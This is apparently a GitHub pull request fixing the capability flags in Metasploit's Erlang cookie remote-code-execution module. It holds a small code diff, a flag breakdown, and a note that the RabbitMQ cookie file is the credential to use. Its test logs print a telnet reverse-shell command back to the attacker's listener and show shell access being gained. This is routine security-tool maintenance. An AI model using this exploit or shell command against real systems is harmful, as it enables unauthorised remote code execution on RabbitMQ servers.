Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add DFLAG_BIG_CREATION to capability flags for erlang_cookie_rce.rb #15634

Merged
merged 3 commits into from
Sep 7, 2021
Merged

Add DFLAG_BIG_CREATION to capability flags for erlang_cookie_rce.rb #15634

merged 3 commits into from
Sep 7, 2021

Conversation

maikthulhu
Copy link
Contributor

@maikthulhu maikthulhu commented Sep 1, 2021
edited by bwatters-r7
Loading

I have been having trouble getting this module (and other projects) to work on a specific target. I took some time to analyze the problem and it appears to be with the included capability flag set (0x3499c). In my case (and I suspect others'), the target node was rejecting the client with "not_allowed". After testing I found that simply adding DFLAG_BIG_CREATION (0x40000) allowed this exploit to work, both on the host I was having trouble with, and an older one where this (unmodified) exploit was still working. Breakdown of flags is below.

0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100
                   |       |||  |   |  | |  | ||-- DFLAG_EXTENDED_REFERENCES
                   |       |||  |   |  | |  | |-- DFLAG_DIST_MONITOR
                   |       |||  |   |  | |  |-- DFLAG_FUN_TAGS
                   |       |||  |   |  | |-- DFLAG_NEW_FUN_TAGS 
                   |       |||  |   |  |-- DFLAG_EXTENDED_PIDS_PORTS 
                   |       |||  |   |-- DFLAG_NEW_FLOATS 
                   |       |||  |-- DFLAG_SMALL_ATOM_TAGS
                   |       |||-- DFLAG__UTF8_ATOMS
                   |       ||-- DFLAG_MAP_TAG 
                   |       |-- **DFLAG_BIG_CREATION**
                   |-- DFLAG_HANDSHAKE_23

This fixes the send_name procedure in this exploit for some hosts which support slightly different capability flags. The updated flags also appear to continue working against hosts where this exploit worked previously.

Verification

List the steps needed to make sure this thing works

  • Install the Erlang Port Mapper Daemon
  • Install RabbitMQ
  • Start msfconsole
  • use exploit/multi/misc/erlang_cookie_rce
  • set RHOST <ip>
  • set COOKIE <cookie>
  • set TARGET <target>
  • set LHOST <host>
  • exploit
  • Verify shell is returned

@maikthulhu
Add DFLAG_BIG_CREATION to capability flags
5742e1c 
I have been having trouble with this module (and other projects) using the included set of capability flags (0x3499c) on a specific host. I took some time to analyze the problem and it appears to be with the included flag set. In my case (and I suspect others'), the target node was rejecting the client with "not_allowed". After testing I found that simply adding DFLAG_BIG_CREATION (0x40000) allowed this exploit to work, both on the host I was having trouble with, and an older one where this (unmodified) exploit was working. Breakdown of flags is below.

```
0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100
                   |       |||  |   |  | |  | ||-- DFLAG_EXTENDED_REFERENCES
                   |       |||  |   |  | |  | |-- DFLAG_DIST_MONITOR
                   |       |||  |   |  | |  |-- DFLAG_FUN_TAGS
                   |       |||  |   |  | |-- DFLAG_NEW_FUN_TAGS 
                   |       |||  |   |  |-- DFLAG_EXTENDED_PIDS_PORTS 
                   |       |||  |   |-- DFLAG_NEW_FLOATS 
                   |       |||  |-- DFLAG_SMALL_ATOM_TAGS
                   |       |||-- DFLAG__UTF8_ATOMS
                   |       ||-- DFLAG_MAP_TAG 
                   |       |-- **DFLAG_BIG_CREATION**
                   |-- DFLAG_HANDSHAKE_23
```
smcintyre-r7
smcintyre-r7 reviewed Sep 1, 2021
View reviewed changes
modules/exploits/multi/misc/erlang_cookie_rce.rb Outdated
@@ -141,7 +141,7 @@ def exploit
send_name << [(@our_node.length+7).to_s(16)].pack('H*') #
send_name << "\x6e" # Tag: n
send_name << "\x00\x05" # Version: R6 (5)
send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
send_name << "\x00\x07\x49\x9c" # Flags (0x0003499c)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

So the comment is out of date now. You also included a really detailed description in the PR text. Since you put effort into it, would you mind putting it all in as a comment here so we know what's going on in the future?

0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100
                   |       |||  |   |  | |  | ||-- DFLAG_EXTENDED_REFERENCES
                   |       |||  |   |  | |  | |-- DFLAG_DIST_MONITOR
                   |       |||  |   |  | |  |-- DFLAG_FUN_TAGS
                   |       |||  |   |  | |-- DFLAG_NEW_FUN_TAGS 
                   |       |||  |   |  |-- DFLAG_EXTENDED_PIDS_PORTS 
                   |       |||  |   |-- DFLAG_NEW_FLOATS 
                   |       |||  |-- DFLAG_SMALL_ATOM_TAGS
                   |       |||-- DFLAG__UTF8_ATOMS
                   |       ||-- DFLAG_MAP_TAG 
                   |       |-- **DFLAG_BIG_CREATION**
                   |-- DFLAG_HANDSHAKE_23

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sorry I'm not quite sure of the flow here. When you say "put it all in as a comment here", do you mean to add the notes and flags breakdown to the ruby module? I can, no problem, just want to make sure I understand what you're saying.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Just listing out the flags that are set would be helpful. Something like DLFAG_BIG_CREATION | DFLAG_MAP_TAG etc, but it might have to be broken across lines because it'd contain so many.

Whatever you think would have been helpful for you if you had to do this again.

@smcintyre-r7
Copy link
Contributor

Do you have any tips on setting up an environment where the server would be affected by this issue?

@maikthulhu
Copy link
Contributor Author

Do you have any tips on setting up an environment where the server would be affected by this issue?

Mostly anywhere you can get a RabbitMQ instance running. I've had success with Ubuntu 20.04 and 18.04 with native repos (apt install rabbitmq-server) and CentOS 7 and EPEL repo (yum install epel-release && yum install rabbitmq-server).

The cookie value to pass in can be found in /var/lib/rabbitmq/.erlang.cookie.

@maikthulhu
Defined capability flags in comment
2bfc8d3 
Added descriptive comment for included capability flags.
@maikthulhu
Fixed typo
28e3580 
Extraneous `.`. Thanks, macOS!
@bwatters-r7 bwatters-r7 self-assigned this Sep 7, 2021
@bwatters-r7
Copy link
Contributor

Old and Busted

msf6 exploit(multi/misc/erlang_cookie_rce) > set rhost 192.168.134.116
rhost => 192.168.134.116
msf6 exploit(multi/misc/erlang_cookie_rce) > show options

Module options (exploit/multi/misc/erlang_cookie_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COOKIE                    yes       Erlang cookie to login with
   RHOSTS   192.168.134.116  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    25672            yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix


msf6 exploit(multi/misc/erlang_cookie_rce) > set cookie ICWWZBSEUUKTNZDPZODN
cookie => ICWWZBSEUUKTNZDPZODN
msf6 exploit(multi/misc/erlang_cookie_rce) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 exploit(multi/misc/erlang_cookie_rce) > set verbose true
verbose => true
msf6 exploit(multi/misc/erlang_cookie_rce) > run

[+] sh -c '(sleep 4216|telnet 192.168.135.197 4444|while : ; do sh && break; done 2>&1|telnet 192.168.135.197 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.135.197:4444 
[*] 192.168.134.116:25672 - Receiving server challenge
[*] 192.168.134.116:25672 - MD5 digest generated: 1daeb15874a5c93e8da06df81b2aefb3
[*] 192.168.134.116:25672 - Sending challenge reply
[+] 192.168.134.116:25672 - Authentication successful, sending payload
[*] 192.168.134.116:25672 - Exploiting...
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/erlang_cookie_rce) >

New and Improved:

msf6 exploit(multi/misc/erlang_cookie_rce) > show options

Module options (exploit/multi/misc/erlang_cookie_rce):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   COOKIE   ICWWZBSEUUKTNDPZODN  yes       Erlang cookie to login with
   RHOSTS   192.168.134.116      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    25672                yes       The target port (TCP)
   SRVHOST  0.0.0.0              yes       The local host or network interface to listen on. This must be an address on the local m
                                           achine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080                 yes       The local port to listen on.
   SSL      false                no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix


msf6 exploit(multi/misc/erlang_cookie_rce) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 exploit(multi/misc/erlang_cookie_rce) > set cookie ICWWZBSEUUKTNZDPZODN
cookie => ICWWZBSEUUKTNZDPZODN
msf6 exploit(multi/misc/erlang_cookie_rce) > run

[+] sh -c '(sleep 3785|telnet 192.168.135.197 4444|while : ; do sh && break; done 2>&1|telnet 192.168.135.197 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.135.197:4444 
[*] 192.168.134.116:25672 - Receiving server challenge
[*] 192.168.134.116:25672 - MD5 digest generated: d263e485159c9a63451ea8fbc594c761
[*] 192.168.134.116:25672 - Sending challenge reply
[+] 192.168.134.116:25672 - Authentication successful, sending payload
[*] 192.168.134.116:25672 - Exploiting...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ShKfgn8YSC49P34R;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ShKfgn8YSC49P34R\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.135.197:4444 -> 192.168.134.116:53442) at 2021-09-07 12:54:40 -0500

ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.134.116  netmask 255.255.255.0  broadcast 192.168.134.255
        inet6 fd34:fe56:7891:2f3b:9dc7:66e8:9444:2f29  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::f425:4833:dc67:4f8d  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3b:8766:7337:d434:4428  prefixlen 64  scopeid 0x0<global>
        ether 00:0c:29:1d:bb:62  txqueuelen 1000  (Ethernet)
        RX packets 597809  bytes 902522594 (902.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 505728  bytes 46087548 (46.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 560  bytes 42291 (42.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 560  bytes 42291 (42.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

uname -a
Linux ubuntu-18041 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=123(rabbitmq) gid=128(rabbitmq) groups=128(rabbitmq)

@bwatters-r7 bwatters-r7 added the rn-fix release notes fix label Sep 7, 2021
@bwatters-r7 bwatters-r7 merged commit cfc3930 into rapid7:master Sep 7, 2021
@bwatters-r7
Copy link
Contributor

Release Notes

This PR fixes an issue in exploit/multi/misc/erlang_cookie_rce where a missing bitwise flag caused the exploit to fail in some circumstances.

@maikthulhu maikthulhu deleted the patch-1 branch September 7, 2021 19:08
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@maikthulhu @smcintyre-r7 @bwatters-r7